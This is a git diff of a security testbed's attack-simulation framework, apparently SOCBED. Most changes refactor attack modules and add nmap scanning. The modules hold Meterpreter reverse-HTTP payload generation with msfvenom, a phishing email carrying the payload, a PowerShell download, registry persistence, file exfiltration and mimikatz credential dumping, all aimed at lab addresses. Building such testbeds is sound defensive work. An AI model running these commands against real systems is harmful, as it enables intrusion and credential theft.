diff --git a/.github/workflows/clear-cache.yml b/.github/workflows/clear-cache.yml
index 45fc9b5..77bdf45 100644
--- a/.github/workflows/clear-cache.yml
+++ b/.github/workflows/clear-cache.yml
@@ -9,7 +9,7 @@ jobs:
delete-cache:
runs-on: [self-hosted, linux]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
- name: Delete cached iso files
run: rm -rf /usr/share/runner-dependencies/packer_cache/*
diff --git a/.github/workflows/socbed-systemtest-dev.yml b/.github/workflows/socbed-systemtest-dev.yml
index a85236d..bafdf26 100644
--- a/.github/workflows/socbed-systemtest-dev.yml
+++ b/.github/workflows/socbed-systemtest-dev.yml
@@ -8,7 +8,7 @@ jobs:
prepare-environment:
runs-on: [self-hosted, linux]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
with:
ref: dev
@@ -29,7 +29,7 @@ jobs:
needs: [prepare-environment]
timeout-minutes: 480
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
with:
ref: dev
@@ -96,7 +96,7 @@ jobs:
runs-on: [self-hosted, linux]
needs: [prepare-environment, build-machines]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
with:
ref: dev
@@ -119,7 +119,7 @@ jobs:
if: always()
needs: [prepare-environment, build-machines, test-machines]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
with:
ref: dev
diff --git a/.github/workflows/socbed-systemtest.yml b/.github/workflows/socbed-systemtest.yml
index bc66ad4..dc2eda7 100644
--- a/.github/workflows/socbed-systemtest.yml
+++ b/.github/workflows/socbed-systemtest.yml
@@ -9,7 +9,7 @@ jobs:
prepare-environment:
runs-on: [self-hosted, linux]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
- name: Create virtual environment
run: python3 -m venv /usr/share/runner-dependencies/socbed_env
@@ -31,7 +31,7 @@ jobs:
needs: [prepare-environment]
timeout-minutes: 480
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
- name: Activate virtual environment
run: source /usr/share/runner-dependencies/socbed_env/bin/activate
@@ -96,7 +96,7 @@ jobs:
runs-on: [self-hosted, linux]
needs: [prepare-environment, build-machines]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
- name: Activate virtual environment
run: source /usr/share/runner-dependencies/socbed_env/bin/activate
@@ -117,7 +117,7 @@ jobs:
if: always()
needs: [prepare-environment, build-machines, test-machines]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
- name: Delete created VMs
run: ./tools/delete_vms
diff --git a/.github/workflows/socbed-unittest.yml b/.github/workflows/socbed-unittest.yml
index a7e3989..a77aa5a 100644
--- a/.github/workflows/socbed-unittest.yml
+++ b/.github/workflows/socbed-unittest.yml
@@ -8,6 +8,6 @@ jobs:
tox-unit-test:
runs-on: [self-hosted, linux]
steps:
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v3
- run: tox -- -m "not systest"
diff --git a/provisioning/ansible/attacker_playbook.yml b/provisioning/ansible/attacker_playbook.yml
index 5d7efa0..08283ba 100755
--- a/provisioning/ansible/attacker_playbook.yml
+++ b/provisioning/ansible/attacker_playbook.yml
@@ -31,3 +31,4 @@
- generate_malware
- ssh_config
- dosfstools
+ - grc
diff --git a/provisioning/ansible/roles/grc/defaults/main.yml b/provisioning/ansible/roles/grc/defaults/main.yml
new file mode 100644
index 0000000..e8672e0
--- /dev/null
+++ b/provisioning/ansible/roles/grc/defaults/main.yml
@@ -0,0 +1,2 @@
+---
+grc_version: "1.13.1-1"
diff --git a/provisioning/ansible/roles/grc/tasks/main.yml b/provisioning/ansible/roles/grc/tasks/main.yml
new file mode 100644
index 0000000..a29d03e
--- /dev/null
+++ b/provisioning/ansible/roles/grc/tasks/main.yml
@@ -0,0 +1,7 @@
+---
+
+- name: Install grc
+ apt:
+ name: grc={{ grc_version }}
+ state: present
+ update_cache: yes
diff --git a/requirements.txt b/requirements.txt
index f1cf48b..a98bcc3 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,6 +1,6 @@
ansible==5.1.0
colorama==0.4.1
-paramiko==2.10.1
+paramiko==2.11.0
pytest==5.2.0
pyvmomi==6.7.1.2018.12
pywinrm==0.4.1
diff --git a/src/attacks/__init__.py b/src/attacks/__init__.py
index 4850c49..9d3b6f0 100644
--- a/src/attacks/__init__.py
+++ b/src/attacks/__init__.py
@@ -29,7 +29,8 @@
file.split(".py")[0] for file in os.listdir(module_dir)
if file.startswith("attack_") and file.endswith(".py")]
-attack_modules = [import_module("." + str(attack_module_name), package=package) for attack_module_name in attack_module_names]
+attack_modules = [import_module("." + str(attack_module_name), package=package)
+ for attack_module_name in attack_module_names]
attack_subclasses = set()
for attack_module in attack_modules:
diff --git a/src/attacks/attack.py b/src/attacks/attack.py
index 9f1858a..6832aec 100644
--- a/src/attacks/attack.py
+++ b/src/attacks/attack.py
@@ -20,7 +20,6 @@
import socket
from contextlib import contextmanager
from types import SimpleNamespace
-from signal import SIGINT, default_int_handler, signal
import paramiko
from attacks.printer import Printer, ListPrinter, MultiPrinter
diff --git a/src/attacks/attack_c2_exfiltration.py b/src/attacks/attack_c2_exfiltration.py
index 754d120..b58429a 100644
--- a/src/attacks/attack_c2_exfiltration.py
+++ b/src/attacks/attack_c2_exfiltration.py
@@ -70,8 +70,9 @@ def _respond(self, line):
self.handler.shutdown()
def _collect_files(self):
+ path = self.options.path
+ pattern = self.options.pattern
self.ssh_client.write_lines(self.handler.stdin, [
- "run file_collector -r -d {path} -f {pattern} -o /root/loot/files.txt".format(
- path=self.options.path, pattern=self.options.pattern),
+ f"run file_collector -r -d {path} -f {pattern} -o /root/loot/files.txt",
"run file_collector -i /root/loot/files.txt -l /root/loot",
"background"])
diff --git a/src/attacks/attack_change_wallpaper.py b/src/attacks/attack_change_wallpaper.py
index 1d3e822..7ea3826 100644
--- a/src/attacks/attack_change_wallpaper.py
+++ b/src/attacks/attack_change_wallpaper.py
@@ -62,6 +62,6 @@ def _respond(self, line):
self.handler.shutdown()
def _collect_files(self):
- self.ssh_client.write_lines(self.handler.stdin, [
- "execute -H -f powershell -a {script}".format(script=self.change_wallpaper_ps_script),
- "background"])
+ script = self.change_wallpaper_ps_script
+ self.ssh_client.write_lines(self.handler.stdin, [f"execute -H -f powershell -a {script}",
+ "background"])
diff --git a/src/attacks/attack_download_malware.py b/src/attacks/attack_download_malware.py
index b7cd005..60a1cf0 100644
--- a/src/attacks/attack_download_malware.py
+++ b/src/attacks/attack_download_malware.py
@@ -46,8 +46,9 @@ def _set_target(self):
self.ssh_client.target.username = "ssh"
def _download_command(self):
+ url = self.options.url
+ file = self.options.file
return (
"cmd /C powershell -Command $c = new-object System.Net.WebClient; "
- "$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
- "echo File downloaded successfully.".format(
- url=self.options.url, file=self.options.file))
+ f"$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
+ "echo File downloaded successfully.")
diff --git a/src/attacks/attack_download_malware_meterpreter.py b/src/attacks/attack_download_malware_meterpreter.py
index 69e56b6..9e10cfa 100644
--- a/src/attacks/attack_download_malware_meterpreter.py
+++ b/src/attacks/attack_download_malware_meterpreter.py
@@ -64,6 +64,7 @@ def _respond(self, line):
self.handler.shutdown()
def _collect_files(self):
- self.ssh_client.write_lines(self.handler.stdin, [
- "upload {rfile} {file}".format(rfile=self.remote_file, file=self.options.file),
- "background"])
+ rfile = self.remote_file
+ file = self.options.file
+ self.ssh_client.write_lines(self.handler.stdin, [f"upload {rfile} {file}",
+ "background"])
diff --git a/src/attacks/attack_email_exe.py b/src/attacks/attack_email_exe.py
index 4cd137f..c3fd75a 100644
--- a/src/attacks/attack_email_exe.py
+++ b/src/attacks/attack_email_exe.py
@@ -47,17 +47,20 @@ def run(self):
def _generate_exe_command(self):
lhost = self.options.lhost
lport = self.options.lport
- meterpreter_script = f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe"
+ meterpreter_script = ("msfvenom -p windows/x64/meterpreter/reverse_http "
+ f"LHOST={lhost} LPORT={lport} -a x64 StagerRetryCount=604800 "
+ "-f exe-only -o /root/Bank-of-Nuthington.exe")
return meterpreter_script
def _sendemail_command(self, message):
+ address = self.options.addr
return " ".join([
"sendemail",
"-f attacker@localdomain",
- "-t {addr}".format(addr=self.options.addr),
+ f"-t {address}",
"-s 172.18.0.2",
"-u 'Frozen User Account'",
- "-m '{msg}'".format(msg=message),
+ f"-m '{message}'",
"-a '/root/Bank-of-Nuthington.exe'",
"-o tls=no",
"-o message-content-type=html",
@@ -65,9 +68,10 @@ def _sendemail_command(self, message):
""])
def _email_body(self):
+ name = self.options.name
return (
"
"
- "Dear {name},
"
+ f"Dear {name},
"
"our Technical Support Team unfortunately had to freeze your bank account."
" Please download and execute the file provided in the attachment for further"
" information.
"
@@ -75,4 +79,4 @@ def _email_body(self):
" collaboration. This is an automated e-mail. Please do not respond."
"
"
"© 2017 bankofnuthington.co.uk. All Rights Reserved.
"
- "".format(name=self.options.name))
+ "")
diff --git a/src/attacks/attack_flashdrive_exe.py b/src/attacks/attack_flashdrive_exe.py
index b7c6f86..c43b162 100644
--- a/src/attacks/attack_flashdrive_exe.py
+++ b/src/attacks/attack_flashdrive_exe.py
@@ -49,8 +49,8 @@ def _generate_exe_command(self):
lhost = self.options.lhost
lport = self.options.lport
meterpreter_script = (
- f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} "
- "-a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
+ f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} "
+ "-a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
return meterpreter_script
def _generate_image_commands(self):
@@ -69,6 +69,6 @@ def _upload_image_to_client_command(self):
image_path = self.image_path
rhost = self.options.rhost
upload_command = (
- f"sshpass -p 'breach' scp {image_path} ssh@{rhost}:/BREACH/ "
- "&& echo 'Image file successfully sent'")
+ f"sshpass -p 'breach' scp {image_path} ssh@{rhost}:/BREACH/ "
+ "&& echo 'Image file successfully sent'")
return upload_command
diff --git a/src/attacks/attack_flashdrive_exfiltration.py b/src/attacks/attack_flashdrive_exfiltration.py
index 592ce36..a648c03 100644
--- a/src/attacks/attack_flashdrive_exfiltration.py
+++ b/src/attacks/attack_flashdrive_exfiltration.py
@@ -44,7 +44,8 @@ def _set_target(self):
self.ssh_client.target.username = "ssh"
def _copy_files_to_flashdrive_commands(self):
+ directory = self.options.rdir
return [
"imdisk -a -s 64M -m L: -p \"/fs:ntfs /q /y\"",
- "xcopy /E \"{dir}\" L:".format(dir=self.options.rdir),
+ f"xcopy /E \"{directory}\" L:",
"imdisk -D -m L:"]
diff --git a/src/attacks/attack_hashdump.py b/src/attacks/attack_hashdump.py
index 53114b5..98ba9c6 100644
--- a/src/attacks/attack_hashdump.py
+++ b/src/attacks/attack_hashdump.py
@@ -56,7 +56,7 @@ def _handle_output(self):
self._respond(line)
self.print(line)
except UnicodeDecodeError as e:
- self.print("UnicodeDecodeError: {}".format(e))
+ self.print(f"UnicodeDecodeError: {e}")
self.handler.shutdown()
def _respond(self, line):
diff --git a/src/attacks/attack_mimikatz.py b/src/attacks/attack_mimikatz.py
index 7f2446e..d112529 100644
--- a/src/attacks/attack_mimikatz.py
+++ b/src/attacks/attack_mimikatz.py
@@ -54,7 +54,7 @@ def _handle_output(self):
self._respond(line)
self.print(line)
except UnicodeDecodeError as e:
- self.print("UnicodeDecodeError: {}".format(e))
+ self.print(f"UnicodeDecodeError: {e}")
self.handler.shutdown()
def _respond(self, line):
@@ -76,4 +76,3 @@ def _run_mimikatz(self):
"load kiwi",
"creds_all",
"background"])
-
diff --git a/src/attacks/attack_nmap_host_discovery.py b/src/attacks/attack_nmap_host_discovery.py
new file mode 100644
index 0000000..1a3d627
--- /dev/null
+++ b/src/attacks/attack_nmap_host_discovery.py
@@ -0,0 +1,22 @@
+from attacks import Attack, AttackInfo
+from attacks.nmap_attack_options import NmapAttackOptions as AttackOptions
+from attacks.nmap_attack_options import get_speed
+
+
+class NmapHostDiscoveryAttackOptions(AttackOptions):
+ target: str = "Target range or IP"
+
+ def _set_defaults(self) -> None:
+ self.target = "192.168.56.1/23"
+
+
+class NmapHostDiscoveryAttack(Attack):
+ info: AttackInfo = AttackInfo(
+ name="misc_nmap_host_discovery",
+ description="Scan the network for available hosts",
+ )
+ options_class = NmapHostDiscoveryAttackOptions
+
+ def run(self) -> None:
+ command: str = f"nmap -T{get_speed(self.options)} -n -sn {self.options.target}"
+ self.exec_command_on_target(command)
diff --git a/src/attacks/attack_nmap_portscan.py b/src/attacks/attack_nmap_portscan.py
new file mode 100644
index 0000000..2448850
--- /dev/null
+++ b/src/attacks/attack_nmap_portscan.py
@@ -0,0 +1,44 @@
+from attacks import Attack, AttackInfo
+from attacks.nmap_attack_options import NmapAttackOptions as AttackOptions
+from attacks.nmap_attack_options import get_speed
+
+
+class NmapPortscanAttackOptions(AttackOptions):
+ target: str = "Target IP or range"
+ scan_type: str = "Scan Type"
+ ports: str = "Ports to scan, set to 'ics' to scan a list of ICS-specific ports"
+
+ def _set_defaults(self) -> None:
+ self.target = "192.168.56.101"
+ self.scan_type = "-sT -sU"
+ self.ports = "top10"
+
+
+class NmapPortscanAttack(Attack):
+ info = AttackInfo(
+ name="misc_nmap_portscan",
+ description="Scan for open ports",
+ )
+ options_class = NmapPortscanAttackOptions
+ ics_ports: str = (
+ "U:47808,20000,34980,2222,44818,55000-55003,1089-1091,34962-34964,4000,161,"
+ + "T:20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000,2404"
+ )
+
+ def run(self) -> None:
+ port = self._set_port()
+
+ command: str = (
+ f"sudo nmap -T{get_speed(self.options)} -n {self.options.scan_type} "
+ f"{self.options.target}{port}"
+ )
+ self.exec_command_on_target(command)
+
+ def _set_port(self) -> str:
+ if self.options.ports == "ics":
+ return f" -p {self.ics_ports}"
+
+ if self.options.ports.startswith("top"):
+ return f" --top-ports {self.options.ports.strip('top')}"
+
+ return f" -p {self.options.ports}"
diff --git a/src/attacks/attack_nmap_service_discovery.py b/src/attacks/attack_nmap_service_discovery.py
new file mode 100644
index 0000000..7ae5fde
--- /dev/null
+++ b/src/attacks/attack_nmap_service_discovery.py
@@ -0,0 +1,88 @@
+from typing import Dict, List
+
+from attacks import Attack, AttackInfo
+from attacks.nmap_attack_options import NmapAttackOptions as AttackOptions
+from attacks.nmap_attack_options import get_speed
+from attacks.util import print_error, print_warning
+
+
+class NmapServiceDiscoveryAttackOptions(AttackOptions):
+ target: str = "Target IP or range"
+ scan_type: str = (
+ "Scan Type [(comprehensive), os_detect, snmp_info, snmp, iec104_info, vuln, empty]"
+ )
+ port: str = "Ports to scan"
+ exclude_ports: str = "Ports to exclude from scan"
+ script: str = "Nmap script to run"
+
+ def _set_defaults(self) -> None:
+ self.target = "192.168.56.101"
+ self.port = ""
+ self.exclude_ports = ""
+ self.script = ""
+ self.scan_type = "comprehensive"
+ self.scan_type_choices = [
+ "comprehensive",
+ "os_detect",
+ "snmp_info",
+ "snmp",
+ "iec104_info",
+ "vuln",
+ "empty",
+ ]
+
+
+class NmapServiceDiscoveryAttack(Attack):
+ info = AttackInfo(
+ name="misc_nmap_service_discovery",
+ description="Scan for exposed services",
+ )
+ options_class = NmapServiceDiscoveryAttackOptions
+
+ def run(self) -> None:
+ command: str = (
+ f"sudo nmap -T{get_speed(self.options)} -n{self.get_nmap_args()} "
+ f"{self.options.target}"
+ )
+ self.exec_command_on_target(command)
+
+ @staticmethod
+ def format_arg(argument: str, user_value: str, variant_value: str = "") -> str:
+ # this creates an ordered set of option values
+ # https://stackoverflow.com/questions/1653970/does-python-have-an-ordered-set/53657523#53657523
+ ordered_values: List[str] = [
+ option for option in dict.fromkeys([variant_value, *user_value.split(",")]) if option
+ ]
+
+ if not ordered_values:
+ return ""
+ return f" {argument} {','.join(ordered_values)}"
+
+ def get_nmap_args(self) -> str:
+ variants: Dict = dict(
+ SNMP_INFO={"option": "-sU", "port": "161", "script": "snmp-info"},
+ SNMP={"option": "-sU -sV -sC", "port": "161"},
+ IEC104_INFO={"port": "2404", "script": "iec-identify"},
+ OS_DETECT={"option": "-O"},
+ COMPREHENSIVE={"option": "-A"},
+ VULN={"script": "vuln"},
+ EMPTY={},
+ )
+
+ try:
+ variant_options = variants[self.options.scan_type.upper()]
+ except LookupError:
+ print_error(f"Invalid option: {self.options.scan_type}")
+ print_warning("Default to: empty")
+ self.options.scan_type = "empty"
+ variant_options = variants[self.options.scan_type.upper()]
+
+ return self._resolve_nmap_args(**variant_options)
+
+ def _resolve_nmap_args(self, option="", port="", script="") -> str:
+ resolved_args = f" {option}"
+ resolved_args += self.format_arg("-p", self.options.port, port)
+ resolved_args += self.format_arg("--exclude-ports", self.options.exclude_ports)
+ resolved_args += self.format_arg("--script", self.options.script, script)
+
+ return resolved_args
diff --git a/src/attacks/attack_set_autostart.py b/src/attacks/attack_set_autostart.py
index aad8cb9..5e3d10b 100644
--- a/src/attacks/attack_set_autostart.py
+++ b/src/attacks/attack_set_autostart.py
@@ -46,7 +46,8 @@ def _set_target(self):
self.ssh_client.target.username = "ssh"
def _autostart_command(self):
+ name = self.options.name
+ data = self.options.data
return (
"REG ADD HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
- "/v \"{name}\" /t REG_SZ /d \"{data}\" /f".format(
- name=self.options.name, data=self.options.data))
+ f"/v \"{name}\" /t REG_SZ /d \"{data}\" /f")
diff --git a/src/attacks/attack_take_screenshot.py b/src/attacks/attack_take_screenshot.py
index 4897bd9..a605562 100644
--- a/src/attacks/attack_take_screenshot.py
+++ b/src/attacks/attack_take_screenshot.py
@@ -67,6 +67,6 @@ def _respond(self, line):
self.handler.shutdown()
def _collect_files(self):
- self.ssh_client.write_lines(self.handler.stdin, [
- "screenshot -p {file}".format(file=self.screenshot_file),
- "background"])
+ file = self.screenshot_file
+ self.ssh_client.write_lines(self.handler.stdin, ["screenshot -p {file}",
+ "background"])
diff --git a/src/attacks/attackconsole.py b/src/attacks/attackconsole.py
index 4832199..b863fd1 100755
--- a/src/attacks/attackconsole.py
+++ b/src/attacks/attackconsole.py
@@ -75,7 +75,7 @@ def _add_isotime_to_record(cls, record):
tz = cls._tz_fix.match(time.strftime("%z"))
if time.timezone and tz:
offset_hrs, offset_min = tz.groups()
- isotime += "{0}:{1}".format(offset_hrs, offset_min)
+ isotime += f"{offset_hrs}:{offset_min}"
else:
isotime += "Z"
record.__dict__["isotime"] = isotime
@@ -113,7 +113,7 @@ def __init__(self, attack_class, **kwargs):
option: self.options_class.__dict__[option]
for option in self.attack_options}
self.attack = self.attack_class(printer=ConsolePrinter())
- self.prompt = "attackconsole ({name}) > ".format(name=self.attack_class.info.name)
+ self.prompt = f"attackconsole ({self.attack_class.info.name}) > "
def precmd(self, line):
if not self._stdin_is_a_tty():
@@ -150,12 +150,19 @@ def do_set(self, arg):
print("*** Invalid number of option arguments\n*** Usage: set ")
def complete_set(self, text, line, begidx, endidx):
+ opt = line.split(" ")[1].strip()
+ if opt in self.attack_option_descriptions.keys():
+ return [
+ option
+ for option in self.attack.options.__getattribute__(f"{opt}_choices")
+ if option.startswith(text)
+ ]
return [option + " " for option in self.attack_option_descriptions.keys() if
option.startswith(text)]
def do_reset(self, _arg):
- self.attack.options._set_options_to_none()
- self.attack.options._set_defaults()
+ self.attack.options._set_options_to_none()
+ self.attack.options._set_defaults()
def do_run(self, arg):
attack_name = self.attack.info.name
@@ -165,7 +172,7 @@ def do_run(self, arg):
try:
self.attack.run()
except AttackException as e:
- print("*** Exception: {e}".format(e=e))
+ print(f"*** Exception: {e}")
log_dict.update(event="attack_failed", failed_with=str(e).replace("\n", " "))
self.logger.info("Attack failed", log_dict=log_dict)
except KeyboardInterrupt:
@@ -222,7 +229,7 @@ def do_use(self, arg):
attack_class=self.attack_classes[attack], **self.kwargs)
sub_attack_console.cmdloop()
else:
- print("*** Unknown attack: {attack}".format(attack=attack))
+ print(f"*** Unknown attack: {attack}")
def complete_use(self, text, line, begidx, endidx):
return [attack for attack in self.attack_classes.keys() if attack.startswith(text)]
@@ -256,7 +263,7 @@ def generate(self):
intro = "\n".join([
fortune,
"+ -- - -= [\t BREACH Attack Console \t\t]",
- "+ -- - -= [\t {} attack(s) \t\t]".format(len(implemented_attacks)),
+ f"+ -- - -= [\t {len(implemented_attacks)} attack(s) \t\t]",
""])
return intro
diff --git a/src/attacks/nmap_attack_options.py b/src/attacks/nmap_attack_options.py
new file mode 100644
index 0000000..c6d0205
--- /dev/null
+++ b/src/attacks/nmap_attack_options.py
@@ -0,0 +1,55 @@
+from enum import IntEnum
+from typing import Any, List
+
+from attacks.attack import AttackOptions
+from attacks.util import print_error, print_warning
+
+
+class Speed(IntEnum):
+ FAST = 5 # nmap timing template insane
+ MEDIUM = 3 # nmap timing template normal
+ SLOW = 1 # nmap timing template sneaky
+
+
+class NmapAttackOptions(AttackOptions):
+ speed: str
+
+ def __init__(self, **kwargs: Any):
+ self._set_options_to_none()
+ self._set_defaults()
+ super().__init__(**kwargs)
+
+ def _set_options_to_none(self) -> None:
+ default_options = dict.fromkeys(self._options(), None)
+ default_options = _set_custom_defaults(default_options)
+ self.__dict__.update(default_options)
+
+ @classmethod
+ def _options(cls) -> List[str]:
+ _set_custom_description(cls)
+ return [att for att in dir(cls) if not att.startswith("_")]
+
+ def _set_defaults(self) -> None:
+ pass
+
+
+def _set_custom_defaults(default_options):
+ default_options["speed"] = "fast"
+ default_options["speed_choices"] = ["slow", "medium", "fast"]
+
+ return default_options
+
+
+def _set_custom_description(cls):
+ cls.speed = "Attack speed [slow, medium, (fast)]"
+
+
+def get_speed(options) -> int:
+ speed = options.speed.upper()
+ try:
+ return Speed[speed]
+ except KeyError:
+ print_error(f"Invalid option: {options.speed}")
+ options.speed = "fast"
+ print_warning(f"Default to: {options.speed}")
+ return Speed[options.speed.upper()]
diff --git a/src/attacks/reverseconnectionhandler.py b/src/attacks/reverseconnectionhandler.py
index 032348b..e185262 100644
--- a/src/attacks/reverseconnectionhandler.py
+++ b/src/attacks/reverseconnectionhandler.py
@@ -15,8 +15,10 @@
# You should have received a copy of the GNU General Public License
# along with SOCBED. If not, see .
+
import time
+
class ReverseConnectionHandler:
handler_timeout = 330
channel_timeout = 360
@@ -40,12 +42,12 @@ def _msf_command(self):
"\""
"use exploit/multi/handler;"
"set payload windows/x64/meterpreter/reverse_http;"
- "set lhost {lhost};"
- "set lport {lport};"
- "set ReverseListenerBindAddress {lhost};"
- "set ListenerTimeout {timeout};"
+ f"set lhost {self.lhost};"
+ f"set lport {self.lport};"
+ f"set ReverseListenerBindAddress {self.lhost};"
+ f"set ListenerTimeout {self.handler_timeout};"
"exploit;"
- "\"".format(lhost=self.lhost, lport=self.lport, timeout=self.handler_timeout))
+ "\"")
def shutdown(self):
self.stdin.write("exit -y\n")
diff --git a/src/attacks/ssh.py b/src/attacks/ssh.py
index 0401a80..80ec214 100644
--- a/src/attacks/ssh.py
+++ b/src/attacks/ssh.py
@@ -23,6 +23,7 @@
import paramiko
from attacks.util import print_command
+
class SSHTarget(SimpleNamespace):
name = ""
hostname = ""
@@ -46,7 +47,6 @@ class BREACHSSHClient(paramiko.SSHClient):
channel_timeout = 300
connect_timeout = 60
stdin = None
- env_str = "PYTHONUNBUFFERED=1"
def __init__(self, target=None):
super().__init__()
@@ -59,7 +59,7 @@ def _configure(self):
def exec_command_on_target(self, command, printer):
self.connect_to_target()
print_command(command)
- command = self.set_envs(command)
+ command = self.wrap_command(command)
stdin, stdout, stderr = self.exec_command(command, timeout=self.channel_timeout, get_pty=True)
self.stdin = stdin
self.print_output(stdout, printer)
@@ -70,7 +70,7 @@ def exec_commands_on_target(self, commands, printer):
self.connect_to_target()
for command in commands:
print_command(command)
- command = self.set_envs(command)
+ command = self.wrap_command(command)
stdin, stdout, stderr = self.exec_command(command, timeout=self.channel_timeout, get_pty=True)
self.stdin = stdin
self.print_output(stdout, printer)
@@ -90,6 +90,25 @@ def set_envs(self, command):
return command.replace("sudo", f"sudo {self.env_str}")
return f"{self.env_str} {command}"
+ def _get_grc_string(self) -> str:
+ if not self.exec_command("which grc", timeout=2)[0].channel.recv_exit_status():
+ return "grc --colour=on"
+ return ""
+
+ def wrap_command(self, command: str) -> str:
+ if "windows" in self._transport.remote_version.lower():
+ return command
+
+ env_str: str = "PYTHONUNBUFFERED=1"
+ command_prefix: list[str] = [env_str, self._get_grc_string()]
+
+ command_prefix_str = " ".join(x for x in command_prefix if x)
+
+ if command.startswith("sudo"):
+ return command.replace("sudo", f"sudo {command_prefix_str}")
+ return f"{command_prefix_str} {command}"
+
+
def print_output(self, msg_file, printer):
if "windows" in self._transport.remote_version.lower():
self.print_windows_output(msg_file, printer)
diff --git a/src/attacks/tests/test_attack.py b/src/attacks/tests/test_attack.py
index 1e876b2..8e9fc36 100644
--- a/src/attacks/tests/test_attack.py
+++ b/src/attacks/tests/test_attack.py
@@ -18,7 +18,7 @@
import pytest
import socket
-from unittest.mock import patch, Mock
+from unittest.mock import Mock
from attacks.attack import AttackInfo, AttackOptions, Attack, AttackException
diff --git a/src/attacks/tests/test_attack_c2_exfiltration.py b/src/attacks/tests/test_attack_c2_exfiltration.py
index 1833427..8acc472 100644
--- a/src/attacks/tests/test_attack_c2_exfiltration.py
+++ b/src/attacks/tests/test_attack_c2_exfiltration.py
@@ -32,7 +32,7 @@ def attack():
return attack
-class TestC2ExfiltrationAttack():
+class TestC2ExfiltrationAttack:
def test_raise_exception_bad_output(self, attack: C2ExfiltrationAttack):
attack.ssh_client.exec_command = Mock(return_value=(Mock(), ["Bad output"], []))
with pytest.raises(AttackException):
diff --git a/src/attacks/tests/test_attack_email_exe.py b/src/attacks/tests/test_attack_email_exe.py
index 1fce4b1..5bec864 100644
--- a/src/attacks/tests/test_attack_email_exe.py
+++ b/src/attacks/tests/test_attack_email_exe.py
@@ -33,7 +33,9 @@ def attack():
class TestEmailEXEAttack:
def test_generate_exe_command(self, attack: EmailEXEAttack):
exe_command = attack._generate_exe_command()
- expected_exe_command = f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.18.0.3 LPORT=80 -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe"
+ expected_exe_command = ("msfvenom -p windows/x64/meterpreter/reverse_http "
+ "LHOST=172.18.0.3 LPORT=80 -a x64 StagerRetryCount=604800 "
+ "-f exe-only -o /root/Bank-of-Nuthington.exe")
assert exe_command == expected_exe_command
def test_sendemail_command(self, attack: EmailEXEAttack):
diff --git a/src/attacks/tests/test_attack_flashdrive_exe.py b/src/attacks/tests/test_attack_flashdrive_exe.py
index f4d2846..9fd2d16 100644
--- a/src/attacks/tests/test_attack_flashdrive_exe.py
+++ b/src/attacks/tests/test_attack_flashdrive_exe.py
@@ -34,8 +34,8 @@ class TestFlashdriveEXEAttack:
def test_generate_exe_command(self, attack: FlashdriveEXEAttack):
exe_command = attack._generate_exe_command()
expected_exe_command = (
- "msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.18.0.3 "
- "LPORT=80 -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
+ "msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.18.0.3 "
+ "LPORT=80 -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
assert exe_command == expected_exe_command
def test_generate_image_commands(self, attack: FlashdriveEXEAttack):
@@ -53,9 +53,9 @@ def test_generate_image_commands(self, attack: FlashdriveEXEAttack):
def test_upload_image_to_client_command(self, attack: FlashdriveEXEAttack):
upload_command = attack._upload_image_to_client_command()
expected_upload_command = (
- "sshpass -p 'breach' scp /root/evil_image_file.img "
- "ssh@192.168.56.101:/BREACH/ && echo 'Image file successfully sent'")
-
+ "sshpass -p 'breach' scp /root/evil_image_file.img "
+ "ssh@192.168.56.101:/BREACH/ && echo 'Image file successfully sent'")
+
assert upload_command == expected_upload_command
def test_raise_exception_bad_output(self, attack: FlashdriveEXEAttack):
diff --git a/src/attacks/tests/test_attack_hashdump.py b/src/attacks/tests/test_attack_hashdump.py
index b5c0a0c..fcc25a4 100644
--- a/src/attacks/tests/test_attack_hashdump.py
+++ b/src/attacks/tests/test_attack_hashdump.py
@@ -32,7 +32,7 @@ def attack():
return attack
-class TestHashdumpAttack():
+class TestHashdumpAttack:
def test_raise_exception_bad_output(self, attack: HashdumpAttack):
attack.ssh_client.exec_command = Mock(return_value=(Mock(), ["Bad output"], []))
with pytest.raises(AttackException):
diff --git a/src/attacks/tests/test_attack_mimikatz.py b/src/attacks/tests/test_attack_mimikatz.py
index 3896bd3..24527f5 100644
--- a/src/attacks/tests/test_attack_mimikatz.py
+++ b/src/attacks/tests/test_attack_mimikatz.py
@@ -32,7 +32,7 @@ def attack():
return attack
-class TestMimikatzAttack():
+class TestMimikatzAttack:
def test_raise_exception_bad_output(self, attack: MimikatzAttack):
attack.ssh_client.exec_command = Mock(return_value=(Mock(), ["Bad output"], []))
with pytest.raises(AttackException):
@@ -42,4 +42,3 @@ def test_no_exception_good_output(self, attack: MimikatzAttack):
indicator = "2aca7635afdc3febc408bee6b89acf16"
attack.ssh_client.exec_command = Mock(return_value=(Mock(), [indicator], []))
attack.run()
-
diff --git a/src/attacks/tests/test_attack_nmap_host_discovery.py b/src/attacks/tests/test_attack_nmap_host_discovery.py
new file mode 100644
index 0000000..774e322
--- /dev/null
